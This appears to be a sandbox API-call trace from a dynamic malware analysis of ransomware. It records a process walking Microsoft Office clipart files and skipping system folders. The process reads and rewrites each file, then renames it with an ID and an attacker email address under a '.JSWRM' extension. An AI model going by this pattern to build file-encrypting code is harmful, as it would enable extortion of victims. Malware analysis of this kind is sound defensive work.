1 [0087.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0087.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0087.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0087.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.911] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212601.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212601.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0087.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0087.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0087.912] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x199a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0212685.WMF", cAlternateFileName="")) returned 1 [0087.912] lstrcmpiW (lpString1="J0212685.WMF", lpString2=".") returned 1 [0087.912] lstrcmpiW (lpString1="J0212685.WMF", lpString2="..") returned 1 [0087.912] lstrcmpiW (lpString1="J0212685.WMF", lpString2="...") returned 1 [0087.912] lstrcmpiW (lpString1="J0212685.WMF", lpString2="windows") returned -1 [0087.912] lstrcmpiW (lpString1="J0212685.WMF", lpString2="recovery") returned -1 [0087.912] lstrcmpiW (lpString1="J0212685.WMF", lpString2="perflogs") returned -1 [0087.912] lstrcmpiW (lpString1="J0212685.WMF", lpString2="documents and settings") returned 1 [0087.912] lstrcmpiW (lpString1="J0212685.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.912] lstrcmpiW (lpString1="J0212685.WMF", lpString2="system volume information") returned -1 [0087.912] lstrcmpiW (lpString1="J0212685.WMF", lpString2="msocache") returned -1 [0087.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0087.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212685.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212685.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0212685.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0087.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0087.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212685.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212685.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0212685.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0087.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0087.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0087.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0087.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212685.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.913] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6554) returned 1 [0087.913] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1990) returned 0x205850 [0087.913] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1990, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1990, lpOverlapped=0x0) returned 1 [0087.915] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.915] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1990, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1990, lpOverlapped=0x0) returned 1 [0087.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.915] CloseHandle (hObject=0x314) returned 1 [0087.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0087.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0087.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0087.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0087.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0087.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0087.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.916] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212685.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212685.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0087.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0087.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0087.916] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x80c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0212751.WMF", cAlternateFileName="")) returned 1 [0087.916] lstrcmpiW (lpString1="J0212751.WMF", lpString2=".") returned 1 [0087.916] lstrcmpiW (lpString1="J0212751.WMF", lpString2="..") returned 1 [0087.917] lstrcmpiW (lpString1="J0212751.WMF", lpString2="...") returned 1 [0087.917] lstrcmpiW (lpString1="J0212751.WMF", lpString2="windows") returned -1 [0087.917] lstrcmpiW (lpString1="J0212751.WMF", lpString2="recovery") returned -1 [0087.917] lstrcmpiW (lpString1="J0212751.WMF", lpString2="perflogs") returned -1 [0087.917] lstrcmpiW (lpString1="J0212751.WMF", lpString2="documents and settings") returned 1 [0087.917] lstrcmpiW (lpString1="J0212751.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.917] lstrcmpiW (lpString1="J0212751.WMF", lpString2="system volume information") returned -1 [0087.917] lstrcmpiW (lpString1="J0212751.WMF", lpString2="msocache") returned -1 [0087.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0087.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212751.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212751.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0212751.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0087.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0087.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212751.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212751.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0212751.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0087.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0087.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0087.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0087.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212751.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.918] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2060) returned 1 [0087.918] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x800) returned 0x20c6c0 [0087.918] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x800, lpOverlapped=0x0) returned 1 [0087.920] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.920] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x800, lpOverlapped=0x0) returned 1 [0087.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0087.920] CloseHandle (hObject=0x314) returned 1 [0087.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0087.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0087.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0087.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0087.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0087.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0087.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0087.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0087.920] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212751.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212751.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0087.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0087.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0087.921] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d4a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0212953.WMF", cAlternateFileName="")) returned 1 [0087.921] lstrcmpiW (lpString1="J0212953.WMF", lpString2=".") returned 1 [0087.921] lstrcmpiW (lpString1="J0212953.WMF", lpString2="..") returned 1 [0087.921] lstrcmpiW (lpString1="J0212953.WMF", lpString2="...") returned 1 [0087.921] lstrcmpiW (lpString1="J0212953.WMF", lpString2="windows") returned -1 [0087.921] lstrcmpiW (lpString1="J0212953.WMF", lpString2="recovery") returned -1 [0087.921] lstrcmpiW (lpString1="J0212953.WMF", lpString2="perflogs") returned -1 [0087.921] lstrcmpiW (lpString1="J0212953.WMF", lpString2="documents and settings") returned 1 [0087.921] lstrcmpiW (lpString1="J0212953.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.921] lstrcmpiW (lpString1="J0212953.WMF", lpString2="system volume information") returned -1 [0087.921] lstrcmpiW (lpString1="J0212953.WMF", lpString2="msocache") returned -1 [0087.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0087.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212953.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212953.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0212953.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0087.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0087.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212953.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212953.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0212953.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0087.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0087.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0087.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0087.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212953.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.922] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7498) returned 1 [0087.922] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d40) returned 0x205850 [0087.922] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1d40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1d40, lpOverlapped=0x0) returned 1 [0087.924] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.924] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1d40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1d40, lpOverlapped=0x0) returned 1 [0087.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.925] CloseHandle (hObject=0x314) returned 1 [0087.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0087.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0087.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0087.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0087.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0087.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0087.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0087.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0087.925] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212953.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212953.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0087.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0087.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0087.926] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa5c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0213243.WMF", cAlternateFileName="")) returned 1 [0087.926] lstrcmpiW (lpString1="J0213243.WMF", lpString2=".") returned 1 [0087.926] lstrcmpiW (lpString1="J0213243.WMF", lpString2="..") returned 1 [0087.926] lstrcmpiW (lpString1="J0213243.WMF", lpString2="...") returned 1 [0087.926] lstrcmpiW (lpString1="J0213243.WMF", lpString2="windows") returned -1 [0087.926] lstrcmpiW (lpString1="J0213243.WMF", lpString2="recovery") returned -1 [0087.926] lstrcmpiW (lpString1="J0213243.WMF", lpString2="perflogs") returned -1 [0087.926] 